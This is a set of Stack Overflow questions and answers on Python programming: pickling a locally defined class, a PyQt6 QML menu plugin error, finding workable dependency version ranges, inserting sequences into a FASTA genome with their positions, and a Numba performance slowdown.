Path("test_dir") @pytest.fixture def test_object(): class TestObject(): def __init__(self, instance_file_name): self.instance_file_name = instance_file_name self.data = "This is a test object." test_object = TestObject("test_object_file") return test_object def test_obj_pickle(test_object): obj_pickle(test_object, Path(TEST_DIR)) path = Path(TEST_DIR, "test_object_file" + ".pkl") assert path.exists() | This doesn't really have anything to do with pytest. When you load an object from a pickle, the pickle machinery needs to know what the class of that object should be. But if you define a class inside a function, then every execution of that function generates a whole new class. pickle has no way to tell which version of the class to use, if any versions even exist in the Python session in which you're loading the pickle. Instead of trying to make it work, and creating a pile of weird inconsistencies and edge cases, pickle just doesn't support pickling instances of classes like that. You need to move your class definition out of the function you have it in: class TestObject: def __init__(self, instance_file_name): self.instance_file_name = instance_file_name self.data = "This is a test object." @pytest.fixture def test_object(): return TestObject("test_object_file") | 1 | 2 |
79,568,766 | 2025-4-11 | https://stackoverflow.com/questions/79568766/pyqt6-on-windows-qtquickcontrols2windowsstyleimplplugin-dll-the-specified-mod | i am trying to test some code using PyQt6. When I try to display en MenuBar in my main.qml, i have this error : QQmlApplicationEngine failed to load component file:///C:/Users/[blablabla]/GUIt/main.qml:11:9: Type Menu unavailable qrc:/qt-project.org/imports/QtQuick/Controls/Windows/Menu.qml:32:15: Type MenuItem unavailable qrc:/qt-project.org/imports/QtQuick/Controls/Windows/MenuItem.qml:7:1: Impossible de charger la bibliothÞque C:\Users\[blablabla]\Python\Python313\Lib\site-packages\PyQt6\Qt6\qml\QtQuick\Controls\Windows\impl\qtquickcontrols2windowsstyleimplplugin.dllá: Le module spÚcifiÚ est introuvable. (Sorry i'm french so my errors too, but "Le module spÚcifiÚ est introuvable." means "The specified module could not be found") I could not find any solved issue similar to my problem so i try my luck here. I am on Windows 11, and I am using Python3.13.3 (not the native Windows installation) Here is my code : main.py : from PyQt6.QtWidgets import QApplication from PyQt6.QtQml import QQmlApplicationEngine from backend import Backend app = QApplication([]) engine = QQmlApplicationEngine() backend = Backend() engine.rootContext().setContextProperty("pybackend", backend) engine.load("main.qml") if not engine.rootObjects(): import sys sys.exit(-1) app.exec() backend.py : from PyQt6.QtCore import QObject, pyqtSlot, pyqtProperty, pyqtSignal from PyQt6.QtWidgets import QFileDialog from git import Repo from models.CommitList import CommitListModel class Backend(QObject): repoPathChanged = pyqtSignal() repoNameChanged = pyqtSignal() commitListChanged = pyqtSignal() def __init__(self): super().__init__() self._commit_list = CommitListModel() self._repo_path = "" self.repo = None self._repo_name = "" @pyqtProperty(str, notify=repoPathChanged) def repoPath(self): return self._repo_path @pyqtProperty(str, notify=repoNameChanged) def repoName(self): return self._repo_name @pyqtProperty(QObject, notify=commitListChanged) def commitList(self): return self._commit_list @pyqtSlot() def chooseAndLoadRepo(self): dialog = QFileDialog() dialog.setFileMode(QFileDialog.FileMode.Directory) dialog.setOption(QFileDialog.Option.ShowDirsOnly, True) if dialog.exec(): selected_dirs = dialog.selectedFiles() if selected_dirs: self.loadRepo(selected_dirs[0]) # charge le dossier sélectionné @pyqtSlot() def loadRepo(self, path = "C:/Users/lucie/Hesias/B2/MajorProject/major-project-b2"): try: self.repo = Repo(path) self._repo_path = path self._repo_name = path.split("/")[-1] self.repoPathChanged.emit() self.repoNameChanged.emit() except Exception as e: print(f"Erreur : {e}") @pyqtSlot() def loadCommits(self): try: commits = [f"{c.hexsha[:7]}: {c.summary}" for c in self.repo.iter_commits()] print(commits) self._commit_list.setCommits(commits) self.commitListChanged.emit() except Exception as e: self._commit_list.setCommits([f"Erreur : {e}"]) models/CommitList.py : from PyQt6.QtCore import QAbstractListModel, Qt, QModelIndex class CommitListModel(QAbstractListModel): def __init__(self, commits=None): super().__init__() self._commits = commits or [] def data(self, index, role): if role == Qt.ItemDataRole.DisplayRole and index.isValid(): return self._commits[index.row()] return None def rowCount(self, index): return len(self._commits) def setCommits(self, commits): self.beginResetModel() self._commits = commits self.endResetModel() main.qml : import QtQuick import QtQuick.Controls 
ApplicationWindow { visible: true width: 640 height: 480 title: qsTr("GUIt") MenuBar { Menu { title: "Fichier" Action { text: "Charger un dépôt" onTriggered: pybackend.chooseAndLoadRepo() } // Tu peux ajouter plus d'actions ici // Action { // text: "Autre option" // onTriggered: { /* action ici */ } // } } // Ajoute un menu "Édition" Menu { title: "Édition" Action { text: "Option 1" onTriggered: { /* action ici */ } } Action { text: "Option 2" onTriggered: { /* action ici */ } } } } Column { anchors.centerIn: parent spacing: 10 Text { text: pybackend.repoPath !== "" ? "Repo actuel : " + pybackend.repoName : "Aucun dépôt chargé" font.pixelSize: 20 } Button { text: "Charger le dépôt" // onClicked: pybackend.loadRepo() onClicked: pybackend.chooseAndLoadRepo() } Button { text: "Charger les commits" onClicked: pybackend.loadCommits() enabled: pybackend.repoPath !== "" } ListView { width: parent.width height: 300 model: pybackend.commitList delegate: Text { text: model.display // ou juste `modelData` si le rôle par défaut est utilisé font.pixelSize: 14 padding: 4 } } } } | The last version of QtQuick.Controls which supports a natively rendered Windows MenuBar was version 1.4. Unfortunately, for your current code, QtQuick.Controls available with PyQt6 is version 2. In order to use QtQuick.Controls 1.4, you have to use PyQt5. Use PyQt5 instead of PyQt6 in main.py, backend.py, and CommitList.py. Then, in your main.qml file, specify the QtQuick and QtQuick.Controls versions as show in the code below. In the second menu item, I changed "Action" to "MenuItem", because I'm guessing that is what you really intended. The menu bar should be specified as: menuBar: MenuBar { Also, "padding: 4" is not supported with the above changes. I've marked all of the lines that I changed in main.qml with "// CHANGED". import QtQuick 2.5 // CHANGED import QtQuick.Controls 1.4 // CHANGED ApplicationWindow { visible: true width: 640 height: 480 title: qsTr("GUIt") menuBar: MenuBar { // CHANGED Menu { title: "Fichier" Action { text: "Charger un dépôt" onTriggered: pybackend.chooseAndLoadRepo() } // Tu peux ajouter plus d actions ici // Action { // text: "Autre option" // onTriggered: { /* action ici */ } // } } // Ajoute un menu "Édition" Menu { title: "Édition" MenuItem { // CHANGED text: "Option 1" onTriggered: { /* action ici */ } } MenuItem { // CHANGED text: "Option 2" onTriggered: { /* action ici */ } } } } Column { anchors.centerIn: parent spacing: 10 Text { text: pybackend.repoPath !== "" ? "Repo actuel : " + pybackend.repoName : "Aucun dépôt chargé" font.pixelSize: 20 } Button { text: "Charger le dépôt" // onClicked: pybackend.loadRepo() onClicked: pybackend.chooseAndLoadRepo() } Button { text: "Charger les commits" onClicked: pybackend.loadCommits() enabled: pybackend.repoPath !== "" } ListView { width: parent.width height: 300 model: pybackend.commitList delegate: Text { text: model.display // ou juste `modelData` si le rôle par défaut est utilisé font.pixelSize: 14 // padding: 4 // CHANGED } } } } | 2 | 1 |
79,569,422 | 2025-4-11 | https://stackoverflow.com/questions/79569422/how-to-check-range-of-versions | I have a build_requirments_file.py file, which builds a requirments.txt file for a given python program, but the thing is... It creates something like: huggingface_hub==currently installed version\ pynput==currently installed version\ module==current version But, how will I know in which "range" of versions will my code/programme work? For example, how will I generate something like: hugginface_hub>=versionx.x.x OR pynput<=versionx.x.x OR\ pynput>versionx.x.x but <versionx.x.x (This means greater than versionx.x.x but less than versionx.x.x) For that we usually need to install and test all versions of the requirements.......... I don't want to test so much, you need a whole team for testing, but what if you're just one-man-army?? | Unfortunately there is no nice and clean way to actually do this. Why is that the case? Very time a package gets an updated version, all that really means is that its source code is in some way different. The more utility of the package that you use the more potential sensitivity you may have to different versions of the package. To further complicate this many package often have dependencies on other packages, that may mean that your code by itself may not be super sensitive to different versions of each package, but the functions you are knowingly or unknowingly invoking might actually be more sensitive to the versions of the packages it relies on than your own code itself! To answer your question, here are three ways to ascertain the version ranges: 1: RTFM; take a look at your code and see exactly which functions you are using from each package and look those functions up on the package's website. Most of the larger packages will keep change logs for each version and you should be able to see when the function you are using was introduced and if its signature has changed at some point. This method is relatively fast but has 2 drawbacks: your package might rely on compiled code from another language you do not know and thus cannot confidently ascertain, and not all packages have great change logs or even documentation so just because information is or is not present does not give you 100% confidence that something is working. 2: Test it yourself; the way to truly know the package versions that are acceptable for your code is if you test each one out by hand. This takes a while to do but I will share some tricks that I use to speed this up: i) create a text file where you dump the package versions of successful tests (eg good_versions.txt) ii) create a new python file (eg version_range_test.py) that follows some flow like # version_range_test.py # packages you need import required_package_1 import required_package_2 ... import required_package_n # import yours import my_module # run your module to see if it crashes with each version result = my_module.my_main_func(...) # record the expected resulting data structure into this file expected_result = ... # assert that the result and the expected result are identical assert(result, expected_result) # make a list of all of the packages that you need and their versions package_version_list = [ f'required_package_1=={required_package_1.__version__}', ..., f'required_package_1=={required_package_n.__version__}', ] # write this package list to your file with open ('good_versions.txt', ...) as f: # add whatever formatting you want here package_version_list = ... # save this f.write(package_version_list, ...) 
Running the file in this way will first test that that your code (a) does not crash with the tested versions and (b) that the tested versions will produce the results you want them to. You can test a bunch of variations of inputs if you are concerned about edge cases. If either of these does not happen then your code will crash before it is able to write out the good versions. If you want to automate the reviewing of this file you can write out json data to a json file instead of writing out text to a text file. iii) write a small bash command that you will copy and paste, this command will do 3 things in the following order... uninstall current package versions; install new package versions; run version_range_test.py file. The pseudo-code for this will look something like uninstall old versions: /path/to/python.exe -m uninstall package required_package_1; /path/to/python.exe -m uninstall package required_package_n; install new versions, the version numbers here are the only thing you need to edit when testing: /path/to/python.exe -m install package required_package_1==#; /path/to/python.exe -m install package required_package_n==#; run your code: /path/to/python.exe /path/to/version_range_test.py Putting this all together into a single line to edit: /path/to/python.exe -m uninstall package required_package_1; /path/to/python.exe -m uninstall package required_package_n; /path/to/python.exe -m install package required_package_1==#; /path/to/python.exe -m install package required_package_n==#; /path/to/python.exe /path/to/version_range_test.py You can either edit the version numbers by hand for every single test or write it all in a bash loop, if you do the bash loop then make sure that it will not exit if your test file crashes. iv) After you have ran all of your tests then go review the good_versions.txt file. If you have made it a text file you can just go look for the test that yielded the minimum and maximum versions. If you have made this a json file you can automate the searching of these much easier since it is already parseable. The automation of this can be done in a boiler plate python file. 3: Do both; you can RTFM to get a good idea of what versions you might want to start testing around, and then move onto only testing the versions you think may prove to be more sensitive in order to confirm. This reduces the testing time a lot. Hope this helps! Edit: Forgot to mention full scale automation of this: You can automate everything described above in either a python or bash file, if you see this being a regular occurrence. For this purpose it would make more sense to save this the successful version tests into json format since it is already parseable, rather than writing your own text parser. Here is the pseudo code for what the python file (eg version_ranges_automation.py) would look like: # version_ranges_automation.py ; example of how to automate all of the above import itertools import json import subprocess python_interpreters = ['/path/to/python_a.exe', '/path/to/python_b.exe', ...] package_names = ['required_package_1', ..., 'required_package_n',] versions_lists = [['#1_1', '1_#2'... ], ... ['#n_1', 'n_#2'... 
],] test_filepath = "/path/to/version_range_test.py" results_filepath = "/path/to/good_versions.json" # concat the interpreters and package versions all_combos = [python_interpreters] + versions_lists # get a list of all the permutations of each interpreter and package version: all_version_permutations = list(itertools.product(*all_combos)) # since the uninstall string is always the same it can be established here, if you are testing variations of python interpreters this will need to be placed here via the lambda function. since the interp is the first part of the list it is just pulled out here uninstall_str_func = lambda x: "; ".join(f"{x[0]} uninstall {i} for i in package_names") # you can initialize the install string as an anon function to save time making it in each loop, the package names and versions align so only the versions need to be pulled in, via x. This needs the interpreter names and versions install_str_func = lambda x: "; ".join(f"{x[0]} install {i}=={j}" for i,j in zip(package_names, x[1:])) # lastly you can make an anon function to run your test file: run_test_str_func = lambda x: "; ".join(f"{x[0]} {test_filepath}") # loop through all permutations for i in all_version_permutations: # construct the bash string for this specitic loop iteration tmp_bash_str = "; ".join(x(i) for x in [ uninstall_str_func, install_str_func, run_test_str_func]) # run the test, use a try expect statement just in case, if you want to try: subprocess.call(tmp_bash_str) except: contine # now that the good_versions.json file is complete it can be read in here. There is no best way to format it or define minimum and maximum ranges across a wide array of versions of multipe packages and interpreters. Feel free to use your own heuristics results = json.load(results_filepath) ... | 2 | 3 |
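A more concrete, runnable variant of the same idea using `subprocess` and `python -m pip` (note that the `python.exe -m uninstall package X` form in the pseudo-code above would be `python -m pip uninstall -y X` / `python -m pip install X==version` in practice); the package names, versions and test-script path below are placeholders:

```python
import itertools
import json
import subprocess
import sys

packages = {"required_package_1": ["1.0", "1.1"],
            "required_package_2": ["2.3", "2.4"]}
test_script = "version_range_test.py"   # should exit non-zero when its assertions fail
good = []

for combo in itertools.product(*packages.values()):
    pins = [f"{name}=={ver}" for name, ver in zip(packages, combo)]
    # pip replaces any already-installed version when a different pin is requested
    install = subprocess.run([sys.executable, "-m", "pip", "install", *pins])
    if install.returncode != 0:
        continue
    result = subprocess.run([sys.executable, test_script])
    if result.returncode == 0:
        good.append(pins)

with open("good_versions.json", "w") as f:
    json.dump(good, f, indent=2)
```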
79,568,360 | 2025-4-11 | https://stackoverflow.com/questions/79568360/determine-position-of-an-inserted-string-within-another | Following this post I managed to put together a small function to place within a bigger text body (FASTA) shorter strings determined from another file based on some conditions (e.g. 100 events from a subset of only those 400-to-500 characters in length, and selected randomly). Now, I'm pretty fine with the result; however, I wish to print for those 100 events where exactly they have been added in the bigger text body — ideally, start-end position if not too hard. I guess this could be integrated in get_retro_text() or, if easier, build as an external function, but I cannot really figure out from where to start... any help is greatly appreciated, thanks in advance! ###library import from Bio import SeqIO import random ###string import and wrangling input_file = open("homo_sapiens_strings.fasta.txt") my_dict = SeqIO.to_dict(SeqIO.parse(input_file, "fasta")) s = [] for j in my_dict.values(): s.append(j) ###import FASTA --> some already made function I found to import and print whole FASTA genomes but testing on a part of it def fasta_reader(filename): from Bio.SeqIO.FastaIO import FastaIterator with open(filename) as handle: for record in FastaIterator(handle): yield record head = "" body = "" for entry in fasta_reader("hg37_chr1.fna"): head = str(entry.id) body = str(entry.seq) ###randomly selects 100 sequences and adds them to the FASTA def insert (source_str, insert_str, pos): return source_str[:pos] + insert_str + source_str[pos:] def get_retro_text(genome, all_strings): string_of_choice = [string for string in all_strings if 400 < len(string) < 500] hundred_strings = random.sample(string_of_choice, k=100) text_of_strings = [] for k in range(len(hundred_strings)): text_of_strings.append(str(hundred_strings[k].seq)) single_string = ",".join(text_of_strings) new_genome = insert(genome, single_string, random.randint(0, len(genome))) return new_genome big_genome = get_retro_text(body, s) EDIT example of structure of body and s body NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtaaccctaaccctaacccta accctaaccctaaccctaaccctaaccctaaccctaaccctaaccctaaccctaacccta accctaaccctaaccctaaccctaacccaaccctaaccctaaccctaaccctaaccctaa ccctaacccctaaccctaaccctaaccctaaccctaacctaaccctaaccctaaccctaa ccctaaccctaaccctaaccctaaccctaacccctaaccctaaccctaaaccctaaaccc taaccctaaccctaaccctaaccctaaccccaaccccaaccccaaccccaaccccaaccc caaccctaacccctaaccctaaccctaaccctaccctaaccctaaccctaaccctaaccc taaccctaacccctaacccctaaccctaaccctaaccctaaccctaaccctaaccctaac ccctaaccctaaccctaaccctaaccctcgCGGTACCCTCAGCCGGCCCGCCCGCCCGGG TCTGACCTGAGGAGAACTGTGCTCCGCCTTCAGAGTACCACCGAAATCTGTGCAGAGGAc aacgcagctccgccctcgcggtGCTCtccgggtctgtgctgaggagaacgCAACTCCGCC GTTGCAAAGGCGcgccgcgccggcgcaggcgcagagaggcgcgccgcgccggcgcaggcg cagagaggcgcgccgcgccggcgcaggcgcagagaggcgcgccgcgccggcgcaggcgca gagaggcgcgccgcgccggcgcaggcgcagagaggcgcgccgcgccggcgcaggcgcaga caCATGCTAGCGCGTCGGGGTGGAGGCgtggcgcaggcgcagagaggcgcgccgcgccgg cgcaggcgcagagacaCATGCTACCGCGTCCAGGGGTGGAGGCgtggcgcaggcgcagag aggcgcaccgcgccggcgcaggcgcagagacaCATGCTAGCGCGTCCAGGGGTGGAGGCG TggcgcaggcgcagagacgcAAGCCTAcgggcgggggttgggggggcgTGTGTTGCAGGA GCAAAGTCGCACGGCGCCGGGCTGGGGCGGGGGGAGGGTGGCGCCGTGCACGCGCAGAAA CTCACGTCACGGTGGCGCGGCGCAGAGACGGGTAGAACCTCAGTAATCCGAAAAGCCGGG ATCGACCGCCCCTTGCTTGCAGCCGGGCACTACAGGACCCGCTTGCTCACGGTGCTGTGC CAGGGCGCCCCCTGCTGGCGACTAGGGCAACTGCAGGGCTCTCTTGCTTAGAGTGGTGGC 
CAGCGCCCCCTGCTGGCGCCGGGGCACTGCAGGGCCCTCTTGCTTACTGTATAGTGGTGG CACGCCGCCTGCTGGCAGCTAGGGACATTGCAGGGTCCTCTTGCTCAAGGTGTAGTGGCA GCACGCCCACCTGCTGGCAGCTGGGGACACTGCCGGGCCCTCTTGCTCCAACAGTACTGG CGGATTATAGGGAAACACCCGGAGCATATGCTGTTTGGTCTCAGTAGACTCCTAAATATG GGATTCCTgggtttaaaagtaaaaaataaatatgtttaatttgtGAACTGATTACCATCA GAATTGTACTGTTCTGTATCCCACCAGCAATGTCTAGGAATGCCTGTTTCTCCACAAAGT GTTtacttttggatttttgccagTCTAACAGGTGAAGCCCTGGAGATTCTTATTAGTGAT TTGGGCTGGGGCCTGgccatgtgtatttttttaaatttccactgaTGATTTTGCTGCATG GCCGGTGTTGAGAATGACTGCGCAAATTTGCCGGATTTCCTTTGCTGTTCCTGCATGTAG TTTAAACGAGATTGCCAGCACCGGGTATCATTCACCATTTTTCTTTTCGTTAACTTGCCG TCAGCCTTTTCTTTGACCTCTTCTTTCTGTTCATGTGTATTTGCTGTCTCTTAGCCCAGA CTTCCCGTGTCCTTTCCACCGGGCCTTTGAGAGGTCACAGGGTCTTGATGCTGTGGTCTT CATCTGCAGGTGTCTGACTTCCAGCAACTGCTGGCCTGTGCCAGGGTGCAAGCTGAGCAC TGGAGTGGAGTTTTCCTGTGGAGAGGAGCCATGCCTAGAGTGGGATGGGCCATTGTTCAT s [[SeqRecord(seq=Seq('ATGGCGGGACACCCGAAAGAGAGGGTGGTCACAGATGAGGTCCATCAGAACCAG...TAG'), id='retro_hsap_1', name='retro_hsap_1', description='retro_hsap_1', dbxrefs=[]), SeqRecord(seq=Seq('ATGGTCAACGTACCTAAAACCCGAAGAACCTTCTGTAAGAAGTGTGGCAAGCAT...TAA'), id='retro_hsap_2', name='retro_hsap_2', description='retro_hsap_2', dbxrefs=[]), SeqRecord(seq=Seq('ATGTCCACAATGGGAAACGAGGCCAGTTACCCGGCGGAGATGTGCTCCCACTTT...TGA'), id='retro_hsap_3', name='retro_hsap_3', description='retro_hsap_3', dbxrefs=[])]] | Your current code has some issues: It inserts the 100 randomly selected strings all adjacent to eachother in the genome The 100 strings are concatenated with commas, which end up in the final gnome string So that would need to be fixed first before getting to the question of the positions where the insertions happen. I would tackle these issues as follows. I have placed comments where I changed the code import random # removed the insert function: will not be used def get_retro_text(genome, all_strings): string_of_choice = [string for string in all_strings if 400 < len(string) < 500] hundred_strings = random.sample(string_of_choice, k=100) # get a sorted list of randomly selected insertion points in the genome indices = sorted(random.randrange(len(genome)) for _ in hundred_strings) # get a list sub strings that result from slicing up the genome at the random insertion points slices = [genome[i:j] for i, j in zip([0] + indices, indices + [len(genome)])] # determine what the offsets will be once the selected strings are inserted into the genome start = 0 offsets = [(start := start + len(infix), start := start + len(string)) for infix, string in zip(slices, hundred_strings)] # finally build the new genome by alternating the slices (substrings) with the strings to insert new_genome = "".join("".join(pairs) for pairs in zip(slices, hundred_strings)) + slices[-1] # return both the new genome and the information of where insertions were made return new_genome, offsets # if you have items with a seq attribute, then extract that first: s = [str(item.seq) for item in s] # get both the genome and the information about the insertion points big_genome, offsets = get_retro_text(body, s) print(big_genome) print(offsets) | 1 | 1 |
79,568,961 | 2025-4-11 | https://stackoverflow.com/questions/79568961/why-does-this-fast-function-with-numba-jit-slow-down-if-i-jit-compile-another-fu | So I have this function: import numpy as np import numba as nb @nb.njit(cache=True, parallel=True, nogil=True) def triangle_half_UR_LL(size: int, swap: bool = False) -> tuple[np.ndarray, np.ndarray]: total = (size + 1) * size // 2 x_coords = np.full(total, 0, dtype=np.uint16) y_coords = np.full(total, 0, dtype=np.uint16) offset = 0 side = np.arange(size, dtype=np.uint16) for i in nb.prange(size): offset = i * size - (i - 1) * i // 2 end = offset + size - i x_coords[offset:end] = i y_coords[offset:end] = side[i:] return (x_coords, y_coords) if not swap else (y_coords, x_coords) What it does is not important, the point is it is JIT compiled with Numba and therefore very fast: In [2]: triangle_half_UR_LL(10) Out[2]: (array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 4, 4, 4, 4, 4, 4, 5, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7, 8, 8, 9], dtype=uint16), array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 9, 2, 3, 4, 5, 6, 7, 8, 9, 3, 4, 5, 6, 7, 8, 9, 4, 5, 6, 7, 8, 9, 5, 6, 7, 8, 9, 6, 7, 8, 9, 7, 8, 9, 8, 9, 9], dtype=uint16)) In [3]: %timeit triangle_half_UR_LL(1000) 166 μs ± 489 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [4]: %timeit triangle_half_UR_LL(1000) 166 μs ± 270 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [5]: %timeit triangle_half_UR_LL(1000) 166 μs ± 506 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) Now if I define another function and JIT compile it with Numba, the performance of the fast function inexplicably drops: In [6]: @nb.njit(cache=True) ...: def dummy(): ...: pass In [7]: dummy() In [8]: %timeit triangle_half_UR_LL(1000) 980 μs ± 20 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) In [9]: %timeit triangle_half_UR_LL(1000) 976 μs ± 9.9 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) In [10]: %timeit triangle_half_UR_LL(1000) 974 μs ± 3.11 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) This is real, I have successfully reproduced this issue many times without fail, I start a new interpreter session, I paste the code, it runs fast. I define the dummy function then call the dummy function, and the fast function inexplicably slows down. Screenshot as proof: I am using Windows 11, and I absolutely have no idea what the hell is going on. Is there an explanation for this? And how can I prevent this issue? Interestingly if I get rid of nogil parameter and without changing anything else, the problem magically goes away: In [1]: import numpy as np ...: import numba as nb ...: ...: ...: @nb.njit(cache=True, parallel=True) ...: def triangle_half_UR_LL(size: int, swap: bool = False) -> tuple[np.ndarray, np.ndarray]: ...: total = (size + 1) * size // 2 ...: x_coords = np.full(total, 0, dtype=np.uint16) ...: y_coords = np.full(total, 0, dtype=np.uint16) ...: offset = 0 ...: side = np.arange(size, dtype=np.uint16) ...: for i in nb.prange(size): ...: offset = i * size - (i - 1) * i // 2 ...: end = offset + size - i ...: x_coords[offset:end] = i ...: y_coords[offset:end] = side[i:] ...: ...: return (x_coords, y_coords) if not swap else (y_coords, x_coords) In [2]: %timeit triangle_half_UR_LL(1000) 186 μs ± 47.9 μs per loop (mean ± std. dev. of 7 runs, 1 loop each) In [3]: %timeit triangle_half_UR_LL(1000) 167 μs ± 1.61 μs per loop (mean ± std. dev. 
of 7 runs, 10,000 loops each) In [4]: %timeit triangle_half_UR_LL(1000) 166 μs ± 109 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [5]: @nb.njit(cache=True) ...: def dummy(): ...: pass In [6]: dummy() In [7]: %timeit triangle_half_UR_LL(1000) 167 μs ± 308 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [8]: %timeit triangle_half_UR_LL(1000) 166 μs ± 312 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [9]: %timeit triangle_half_UR_LL(1000) 167 μs ± 624 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) Why does this happen? But no, if I define other functions, somehow the first function slows down again. The simplest way to reproduce the issue is just redefining it: In [7]: dummy() In [8]: %timeit triangle_half_UR_LL(1000) 168 μs ± 750 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [9]: import numpy as np In [10]: %timeit triangle_half_UR_LL(1000) 167 μs ± 958 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [11]: import numba as nb In [12]: %timeit triangle_half_UR_LL(1000) 167 μs ± 311 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [13]: @nb.njit(cache=True, parallel=True) ...: def triangle_half_UR_LL(size: int, swap: bool = False) -> tuple[np.ndarray, np.ndarray]: ...: total = (size + 1) * size // 2 ...: x_coords = np.full(total, 0, dtype=np.uint16) ...: y_coords = np.full(total, 0, dtype=np.uint16) ...: offset = 0 ...: side = np.arange(size, dtype=np.uint16) ...: for i in nb.prange(size): ...: offset = i * size - (i - 1) * i // 2 ...: end = offset + size - i ...: x_coords[offset:end] = i ...: y_coords[offset:end] = side[i:] ...: ...: return (x_coords, y_coords) if not swap else (y_coords, x_coords) In [14]: %timeit triangle_half_UR_LL(1000) 1.01 ms ± 94.3 μs per loop (mean ± std. dev. of 7 runs, 1 loop each) In [15]: %timeit triangle_half_UR_LL(1000) 964 μs ± 2.02 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) The slowdown also happens if I define the following function and call it: @nb.njit(cache=True) def Farey_sequence(n: int) -> np.ndarray: a, b, c, d = 0, 1, 1, n result = [(a, b)] while 0 <= c <= n: k = (n + b) // d a, b, c, d = c, d, k * c - a, k * d - b result.append((a, b)) return np.array(result, dtype=np.uint64) In [6]: %timeit triangle_half_UR_LL(1000) 166 μs ± 296 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [7]: %timeit Farey_sequence(16) The slowest run took 6.25 times longer than the fastest. This could mean that an intermediate result is being cached. 6.03 μs ± 5.72 μs per loop (mean ± std. dev. of 7 runs, 1 loop each) In [8]: %timeit Farey_sequence(16) 2.77 μs ± 50.8 ns per loop (mean ± std. dev. of 7 runs, 100,000 loops each) In [9]: %timeit triangle_half_UR_LL(1000) 966 μs ± 6.48 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) | TL;DR: This mainly comes from the system allocator which does not behave the same way regarding the current state of the memory (hard to predict). When the function is fast, there are no page faults, while when the function is slow, it seems there are a lot of page faults slowing down the master thread. Analysis When a Numpy array is created, it request some memory to the standard C library (a.k.a. libc) typically using the malloc function. For large allocations, the libc request some memory space to the OS. For small allocations, it can preallocate some memory space and recycle so to avoid requesting memory to the OS. Indeed, such OS is pretty expensive. 
Moreover, the virtual memory pages requested by the OS is not physically mapped in RAM when the OS give you the memory space. This is done lazily: when memory is read or written (page per page). This is by the way why np.zeros and np.empty can be faster than np.full (see this post for more information about this). This principle is called overcommit. When a program read/write a page which is not yet mapped in RAM, the MMU trigger an interruption so for the OS to do the actual mapping of the virtual page to a physical page in RAM. This is called a page fault and it is very expensive. Indeed, not only exception are very expensive, but also all modern OS write zeros to mapped pages during a page fault for security reasons (because the page would contain possibly sensitive data of other processes like browsers' passwords). The default allocator of the libc tends not to be conservative. I means it tends to give memory back to the OS and request it again. This means other processes can use this available memory, but it makes processes often requesting memory significantly slower. Regarding the amount of data allocated so far and the overall state of the cached pages, the allocator may or may not request more memory to the OS. Thus, page faults may or may not happens. On top of that, when there is enough contiguous space in the preallocated memory buffers of the libc, the default allocator may or may not recycle a buffer that has been already used recently and stored in the CPU cache. When this happens, there is no need to fetch data from the slow DRAM, it is already there. This effect often happens in loops creating temporary arrays and writing/reading them before (implicitly) deleting them. Here is a practical explanation: Case 1) After the first call of the function, the 2 arrays are stored in the cache assuming is it small enough to fit in it (which is the case here on my PC). One the function is executed, the array is automatically freed but the default allocator does not release it back to the OS. Instead the memory space is recycled for the next function call and this new one can be much faster: no page fault and no need to fetch data from the DRAM! This can happen many times as long as the state of allocated memory does not suddenly change in a way there is no available memory space left for the requested memory arrays. If this case happens, we should see almost no DRAM read/writes nor any page-faults-related system calls (hard to track on Windows). Case 2) At the end of the first function, memory is released back to the OS and then the next function call need to pay the huge overhead of page fault and also DRAM fetches. In fact data should AFAIK even be written back to the DRAM and fetched again (since the chance for both the virtual/physical page to be the same is small and also because of TLB flushes during the unmapping). If this case happens, we should see significant faults-related system calls and certainly also significantly more DRAM reads/writes. Case 3) The libc always recycle memory but the address of the arrays are not always the same. In this case, page faults do not happen but the amount of read/written memory space can be much bigger than what is actually strictly required. This memory space can be so large it does not fit in cache. In this case, cache trashing happens causing expensive DRAM reads/writes. If this case happens, we should not see any page-faults-related function calls or associated overhead, but still significant DRAM reads/writes. 
Based on this, we should be able to make the problem more likely to happen (not guaranteed) if we allocated many arrays of variable size so to change the state of the allocated memory space. Experimental results On my (Windows 10) machine, here is what I get when I succeed to reproduce the effect: In [2]: %timeit triangle_half_UR_LL(1000) 135 μs ± 42 μs per loop (mean ± std. dev. of 7 runs, 1 loop each) In [3]: %timeit triangle_half_UR_LL(1000) 138 μs ± 37.5 μs per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [4]: %timeit triangle_half_UR_LL(1000) 117 μs ± 873 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [5]: %timeit triangle_half_UR_LL(1000) 140 μs ± 11.7 μs per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [6]: a = np.full(10, 0, dtype=np.uint16) In [7]: b = np.full(100, 0, dtype=np.uint16) In [8]: c = np.full(1000, 0, dtype=np.uint16) In [9]: d = np.full(10000, 0, dtype=np.uint16) In [10]: e = np.full(100000, 0, dtype=np.uint16) In [11]: f = np.full(1000000, 0, dtype=np.uint16) In [12]: g = np.full(10000000, 0, dtype=np.uint16) In [13]: h = np.full(100000000, 0, dtype=np.uint16) In [14]: 